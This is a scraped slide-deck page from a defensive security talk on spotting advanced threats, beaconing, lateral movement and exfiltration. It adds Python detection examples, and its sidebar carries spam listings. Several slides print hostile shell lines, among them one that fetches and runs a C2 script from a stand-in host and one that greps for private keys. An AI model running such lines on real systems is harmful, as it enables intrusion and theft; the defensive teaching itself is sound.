Advanced Threats & Lateral Movement Detection

Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Sr. Security Research Engineer
LogRhythm Labs
  
# whoami

•  Greg Foss
•  Sr. Security Researcher
•  LogRhythm Labs – Threat Intel Team
•  Former DOE Penetration Tester
•  Focus => Honeypots, Incident Response, and Red Team
•  OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
  
# ls -lha

1. IT Security Threats
2. Event Correlation
3. Detection
4. DEMO!
  
# man [Advanced Threats]

•  Advanced Persistent Threats
•  Organized Cyber Crime
•  Hacktivists
•  ‘Cyber Terrorists’
•  Etc…

•  Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
•  Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
•  Highly organized, highly motivated, highly resourced.
•  Willing to invest significant time and resources to compromise.
  
It’s when, not if…

•  Mission Oriented
•  Persistent and Driven
•  Patient and Methodical
•  Focus on exponential ROI
•  Emphasis on high IP value targets
•  They will get in…

Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
  
Identify a ‘Hacker’
  
Ok, for real…

•  *Simple… Correlate on odd network / host activity
•  Use the data at hand to actively detect anomalies
•  Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
   •  Confidentiality
   •  Integrity
   •  Availability
  
Advanced Threat Tactics and Evasion

•  Threat actors of all types move slowly and quietly over time, limiting their exposure and the potential for discovery.
•  Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.
  
IT Security Threats
  
# last && echo ‘How are they getting in??’

•  Phishing
   •  91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
   •  http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/
•  2014 Metrics
   •  Average cost per breach => $3.5 million
   •  15% higher than the previous year
   •  http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis
  
# history | more

•  It only takes one…
  
# ./searchsploit ‘client side’ && echo ‘new exploits daily!’
  
# cat [cve-2014-6332] >> /var/www/pwn-IE.html
  
Event Correlation & Detection
  
Defense in Depth
  
Spear Phishing
  
Phishing Attack Log Traces
  
$ vim next.sh

•  Maintain Access…

Image: http://www.netresec.com/images/back_door_open_300x200.png
  
$ ./next.sh

•  Then?
•  *Nothing…
•  For a long time…

•  *not really*
•  They have attained a foothold and are now your newest employees…
  
$ su - root
  
# wget http://bad.stuff.net/c2.py . && ./c2.py

•  Once infected, the beachhead will beacon periodically
  
Behavioral Analytics

•  Beaconing Activity – Usually initiated over port 443 or an encrypted tunnel over port 80.
•  Can be detected with a Firewall or Web Proxy
•  Capability to decrypt SSL traffic is a huge plus
•  Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
•  Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
•  Watch for significant changes over an extended period of time.
  
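The per-host baseline and beacon check the slide describes, carried into code as an added example (not the presenter's or LogRhythm's own). The proxy log format, host names, destination domains and the thresholds are constructed assumptions to tune per environment; the beacon test uses the low variance of inter-request gaps that scripted call-backs show and human browsing does not.

```python
"""Baseline deviation and beacon-periodicity checks over web-proxy logs.

Added example, not from the original slides.  Assumed log format per line:
    <epoch seconds> <user> <src host> <dest domain> <dest port>
All hosts, users and domains below are constructed sample data.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed "baseline" period (condensed): what the two hosts normally do.
BASELINE_LOG = """\
1000 alice ws01 intranet.example 443
1060 alice ws01 news.example 443
1120 alice ws01 mail.example 443
1500 bob ws02 intranet.example 443
1900 bob ws02 docs.example 443
2400 bob ws02 mail.example 443
"""

# Constructed observation period: ws02 starts calling one never-seen domain
# roughly every 300 s with a jitter of only a few seconds.
OBSERVED_LOG = """\
9000 alice ws01 intranet.example 443
9300 alice ws01 news.example 443
9350 alice ws01 mail.example 443
9600 bob ws02 intranet.example 443
9000 bob ws02 cdn-update.example 443
9301 bob ws02 cdn-update.example 443
9599 bob ws02 cdn-update.example 443
9900 bob ws02 cdn-update.example 443
10201 bob ws02 cdn-update.example 443
10499 bob ws02 cdn-update.example 443
"""


def parse(log):
    """Turn the assumed log format into (ts, user, host, domain, port) tuples."""
    events = []
    for line in log.splitlines():
        ts, user, host, domain, port = line.split()
        events.append((int(ts), user, host, domain, int(port)))
    return events


def profile(events):
    """Per-host set of destination domains and total request count."""
    domains, volume = defaultdict(set), defaultdict(int)
    for _, _, host, domain, _ in events:
        domains[host].add(domain)
        volume[host] += 1
    return domains, volume


def baseline_deviations(baseline, observed, new_ratio=0.5, vol_factor=2.0):
    """Hosts whose observed traffic departs from their own baseline: most
    requests go to domains never seen before, or request volume jumped."""
    b_dom, b_vol = profile(baseline)
    o_dom, o_vol = profile(observed)
    flagged = {}
    for host in o_dom:
        unseen = sum(1 for _, _, h, d, _ in observed
                     if h == host and d not in b_dom.get(host, set()))
        ratio = unseen / o_vol[host]
        jump = o_vol[host] / max(b_vol.get(host, 0), 1)
        if ratio >= new_ratio or jump >= vol_factor:
            flagged[host] = {"new_domain_ratio": round(ratio, 2),
                             "volume_factor": round(jump, 2)}
    return flagged


def beacon_candidates(events, min_hits=5, max_cv=0.1):
    """(host, domain, mean gap, coefficient of variation) for host/domain
    pairs contacted at near-constant intervals (CV of the gaps <= max_cv)."""
    times = defaultdict(list)
    for ts, _, host, domain, _ in events:
        times[(host, domain)].append(ts)
    out = []
    for (host, domain), ts_list in times.items():
        if len(ts_list) < min_hits:
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            out.append((host, domain, round(avg), round(cv, 3)))
    return out


if __name__ == "__main__":
    base, obs = parse(BASELINE_LOG), parse(OBSERVED_LOG)
    print("baseline deviations:", baseline_deviations(base, obs))
    print("beacon candidates:", beacon_candidates(obs))
```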
Reconnaissance

•  Ping sweeps, service discovery, etc. – NO
•  Why make unnecessary noise?
•  Instead => access network shares, web apps, and services
•  Passively gather information using available resources…

Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png
  
Lateral Movement

•  Dump Local System Hashes
•  Maybe crack them, maybe it’s not even necessary…
•  Pass the Hash (PtH)
•  Dump plain text passwords
•  Mimikatz -- FTW!
•  Act as an internal employee -- use legitimate means to access resources.
  
Uncovering Internal Reconnaissance and Pivoting

•  Security Operations Goal => Reduce MTTD and MTTR
   •  MTTD – Mean Time to Detect
   •  MTTR – Mean Time to Respond
•  Set Traps => Honeypot / Honey Token access
•  Overt Clues => Modification of user / file / group permissions and pivoting evidence
•  Subtle Clues => VPN access from disparate geographical locations
•  Missed Opportunities => Once inside, they are now an ‘employee’…
  
Lateral Movement Log Traces

•  Microsoft’s granular Event Identification schema (EVID), in conjunction with environment information, provides analysts with plenty of information to track attackers once they have breached the perimeter.
  
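One correlation of the kind this slide points at, as an added example that is not the presenter's or LogRhythm's code: a fan-out check over flattened Event ID 4624 (successful logon) records, flagging an account that authenticates over the network to many distinct hosts within a short window. The events, host and account names and the thresholds are constructed; the field names follow the Windows Security log schema (Computer is the host that logged the event, IpAddress the source, LogonType 3 is a network logon).

```python
"""Fan-out detection over Windows Security Event ID 4624 records.

Added example, not from the original slides.  Each tuple is a flattened,
constructed copy of the fields a SIEM extracts from a 4624 event:
(ts epoch s, EventID, Computer, TargetUserName, IpAddress, LogonType,
 AuthenticationPackageName).
"""
from collections import defaultdict

EVENTS = [
    (1000, 4624, "FS01", "alice",      "10.0.1.20", 3,  "Kerberos"),
    (1300, 4624, "WS11", "bob",        "10.0.1.31", 2,  "Negotiate"),  # console
    (2000, 4624, "WS12", "svc_backup", "10.0.1.50", 3,  "NTLM"),
    (2040, 4624, "WS13", "svc_backup", "10.0.1.50", 3,  "NTLM"),
    (2075, 4624, "WS14", "svc_backup", "10.0.1.50", 3,  "NTLM"),
    (2110, 4624, "FS01", "svc_backup", "10.0.1.50", 3,  "NTLM"),
    (2150, 4624, "DC01", "svc_backup", "10.0.1.50", 3,  "NTLM"),
    (6000, 4624, "FS01", "svc_backup", "10.0.1.50", 3,  "NTLM"),  # later, alone
    (6100, 4624, "WS20", "carol",      "10.0.1.60", 10, "Negotiate"),  # RDP
]


def fan_out(events, window=600, min_hosts=4, logon_type=3):
    """Return (account, source_ip, sorted hosts, auth packages) for every
    account/source pair that logged on to >= min_hosts distinct destination
    computers within `window` seconds.  One alert per pair is enough."""
    by_pair = defaultdict(list)
    for ts, eid, dest, user, src, ltype, pkg in events:
        if eid == 4624 and ltype == logon_type:
            by_pair[(user, src)].append((ts, dest, pkg))
    alerts = []
    for (user, src), hits in by_pair.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until it fits
            while hits[end][0] - hits[start][0] > window:
                start += 1
            span = hits[start:end + 1]
            hosts = sorted({h for _, h, _ in span})
            if len(hosts) >= min_hosts:
                pkgs = sorted({p for _, _, p in span})
                alerts.append((user, src, hosts, pkgs))
                break
    return alerts


if __name__ == "__main__":
    for user, src, hosts, pkgs in fan_out(EVENTS):
        print(f"{user} from {src} -> {len(hosts)} hosts {hosts} via {pkgs}")
```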
Passive Data Extraction

•  Well Poisoning via UNC Paths
•  SMB Replay
•  Help Desk Tickets
•  Responder – By Spider Labs
•  Keylogging
  
Passive Traffic Analysis

•  Analyze / capture anything that comes across the wire.
•  ARP poison hosts of interest, take over switches/routers, etc.

Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
  
# grep -rhi ‘private key’ /* && echo “Identify Key Resources”

•  Keys / Certificates / Passwords
•  File Shares and Databases
•  Intellectual Property
•  Domain Controllers / Exchange / etc.
•  Business Leaders – CXO, Director, VP, etc.
•  Administrative Assistants

Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg
  
# wget http://target/files.tgz && echo “Data Exfiltration”

•  Target data identified, gathered, and moved out of the environment.
•  Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
•  Emails and Employee PII
•  Intellectual Property
•  Trade Secrets

Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg
  
Data Exfiltration is Often Not ‘Advanced’
  
Catching Data Exfiltration

•  Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
•  DNS exfiltration, or sometimes even ICMP Tunneling in high security environments
•  Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
•  Abnormal web server activity, newly created files, etc.
  
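Two of the detections listed above carried into code, as an added example rather than the presenter's own: the DNS check flags a host that sends many distinct, long, high-entropy subdomains to a single domain, and the port check flags payloads that are not TLS on 443/8443 or not HTTP on 80/8080. The query log, flow records (TEST-NET addresses), the two-label "registered domain" shortcut and the thresholds are constructed assumptions.

```python
"""DNS-tunnel and port/protocol-mismatch checks for exfiltration hunting.

Added example, not from the original slides.  All queries, hosts, flows
and thresholds are constructed sample data.
"""
import math
from collections import defaultdict

# Constructed DNS query log: (src host, queried name).  The ws02 group
# mimics data smuggled out in hex-encoded subdomain labels.
DNS_QUERIES = [
    ("ws01", "www.example.com"),
    ("ws01", "mail.example.com"),
    ("ws01", "cdn.example.net"),
    ("ws02", "www.example.com"),
    ("ws02", "3a7f9c1e5b2d8e4f6a0c9b1d.t1.cdn-sync.example"),
    ("ws02", "9d2b6e8f1a3c5e7b0d4f2a6c.t1.cdn-sync.example"),
    ("ws02", "4c8e1f3a7b9d2e6f0a5c1b8d.t1.cdn-sync.example"),
    ("ws02", "7b1d9f3e5a2c8e4f6b0d2a9c.t1.cdn-sync.example"),
    ("ws02", "2e6a8c0f4b1d7e3f9a5c3b0d.t1.cdn-sync.example"),
]

# Constructed flows: (src host, dst ip, dst port, first payload bytes).
FLOWS = [
    ("ws01", "203.0.113.10", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),
    ("ws02", "203.0.113.20", 443, b"SSH-2.0-OpenSSH_8.9\r\n"),
    ("ws01", "203.0.113.30", 80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("ws02", "203.0.113.40", 80, b"\x8f\x1a\xc4\x02\x77\x3b\xe9\x51\x0d\xaa\x63\x9e"),
]


def registered_domain(name, levels=2):
    """Crude registered domain: the last `levels` labels.  A real deployment
    would consult the public-suffix list (assumed out of scope here)."""
    return ".".join(name.lower().rstrip(".").split(".")[-levels:])


def shannon_entropy(s):
    """Bits per character; hex/base32 data sits well above typical words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dns_exfil_suspects(queries, min_unique=5, min_label_len=20, min_entropy=3.0):
    """(src, domain, unique subdomain count) where one host sends many distinct
    subdomains whose leftmost label is long and high-entropy."""
    subs = defaultdict(set)
    for src, name in queries:
        dom = registered_domain(name)
        prefix = name.lower().rstrip(".")[:-len(dom)].rstrip(".")
        if prefix:
            subs[(src, dom)].add(prefix)
    out = []
    for (src, dom), prefixes in subs.items():
        if len(prefixes) < min_unique:
            continue
        labels = [p.split(".")[0] for p in prefixes]
        avg_len = sum(map(len, labels)) / len(labels)
        avg_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            out.append((src, dom, len(prefixes)))
    return out


HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS",
                b"PATCH", b"CONNECT"}


def looks_like_tls(payload):
    """TLS record header: content type 0x16 (handshake), version 0x03 0x00-0x04."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04


def looks_like_http(payload):
    return payload.split(b" ", 1)[0] in HTTP_METHODS


def port_protocol_mismatches(flows):
    """Flows whose first bytes do not match the protocol the port implies."""
    out = []
    for src, dst, dport, first_bytes in flows:
        if dport in (443, 8443) and not looks_like_tls(first_bytes):
            out.append((src, dst, dport, "non-TLS payload on a TLS port"))
        elif dport in (80, 8080) and not looks_like_http(first_bytes):
            out.append((src, dst, dport, "non-HTTP payload on an HTTP port"))
    return out


if __name__ == "__main__":
    print("dns suspects:", dns_exfil_suspects(DNS_QUERIES))
    print("port mismatches:", port_protocol_mismatches(FLOWS))
```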
It all comes down to Event Correlation
  
DEMO
  
Closing Thoughts…

•  Don’t be hard on the outside, soft and chewy on the inside…
•  Implement Layer 3 (network) Segmentation and Least User Privilege
•  Understand your environment and log data so that you can accurately correlate physical and cyber events
•  Implement URL filtering, stateful packet inspection, and binary analysis
•  Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
•  The earlier you can detect attackers the better…
  
Thank You!

QUESTIONS?

Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Senior Security Research Engineer
Greg.Foss[at]logrhythm.com
@heinzarelli

 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018Greg Foss
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Greg Foss
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and OrchestrationGreg Foss
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataGreg Foss
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingGreg Foss
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
 

More from Greg Foss (11)

Cloud Crime Ops
Cloud Crime OpsCloud Crime Ops
Cloud Crime Ops
 
Future of Destructive Malware
Future of Destructive MalwareFuture of Destructive Malware
Future of Destructive Malware
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerCrypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto Farmer
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint Data
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture Training
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Advanced Threats and Lateral Movement Detection

• 1. Advanced Threats & Lateral Movement Detection
  Greg Foss
  OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
  Sr. Security Research Engineer
  LogRhythm Labs
• 2. # whoami
  • Greg Foss
  • Sr. Security Researcher
  • LogRhythm Labs – Threat Intel Team
  • Former DOE Penetration Tester
  • Focus => Honeypots, Incident Response, and Red Team
  • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
• 3. # ls -lha
  1. IT Security Threats
  2. Event Correlation
  3. Detection
  4. DEMO!
• 5. # man [Advanced Threats]
  • Advanced Persistent Threats
  • Organized Cyber Crime
  • Hacktivists
  • ‘Cyber Terrorists’
  • Etc…
  • Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
  • Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
  • Highly organized, highly motivated, highly resourced.
  • Willing to invest significant time and resources to compromise.
• 6. It’s when, not if…
  • Mission Oriented
  • Persistent and Driven
  • Patient and Methodical
  • Focus on exponential ROI
  • Emphasis on high IP value targets
  • They will get in…
  Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
• 8. Ok, for real…
  • *Simple… Correlate on odd network / host activity
  • Use the data at hand to actively detect anomalies
  • Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
    • Confidentiality
    • Integrity
    • Availability
• 9. Advanced Threat Tactics and Evasion
  • Threat actors of all types move slowly and quietly over time, limiting exposure and potential for discovery.
  • Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.
• 11. # last && echo ‘How are they getting in??’
  • Phishing
    • 91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
    • http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/
  • 2014 Metrics
    • Average cost per breach => $3.5 million
    • 15% higher than the previous year
    • http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis
• 13. # history | more
  • It only takes one…
• 14. # ./searchsploit ‘client side’ && echo ‘new exploits daily!’
• 15. # cat [cve-2014-6332] >> /var/www/pwn-IE.html
• 16. Event Correlation & Detection
• 19. Phishing Attack Log Traces
• 20. $ vim next.sh
  • Maintain Access…
  Image: http://www.netresec.com/images/back_door_open_300x200.png
• 21. $ ./next.sh
  • Then?
  • *Nothing…
  • For a long time…
  • *not really*
  • They have attained a foothold and are now your newest employees…
• 22. $ su - root
• 23. # wget http://bad.stuff.net/c2.py . && ./c2.py
  • Once infected, the beachhead will beacon periodically
• 24. Behavioral Analytics
  • Beaconing Activity – Usually initiated over port 443 or an encrypted tunnel over port 80.
    • Can be detected with a Firewall or Web Proxy
    • Capability to decrypt SSL traffic is a huge plus
  • Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
    • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
    • Watch for significant changes over an extended period of time.
